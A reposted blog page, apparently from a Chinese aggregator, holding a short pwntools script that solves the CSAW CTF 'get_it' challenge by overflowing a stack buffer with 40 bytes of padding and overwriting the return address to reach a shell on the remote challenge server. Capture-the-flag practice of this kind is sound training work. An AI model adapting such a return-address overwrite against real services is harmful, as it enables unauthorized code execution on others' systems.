python getit sploit

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了python getit sploit相关的知识,希望对你有一定的参考价值。

from pwn import *

# p = process("get_it")
p = remote('pwn.chal.csaw.io', 9001)

# gdb.attach(p, "b *0x4005f1")

print p.recv()
payload = b'\x41'*40
payload = payload + b'\xb6\x05\x40\x00\x00\x00\x00'
p.sendline(payload)

p.interactive()

以上是关于python getit sploit的主要内容,如果未能解决你的问题,请参考以下文章

GetIt/Injectable 在抽象类上缺少可注入装饰器?

getit

getit

在 Flutter 中探索 GetIt

GetIT 2020 Big List with 81 downloads directly from Embarcadero

ms14-068漏洞获取域控管理员密码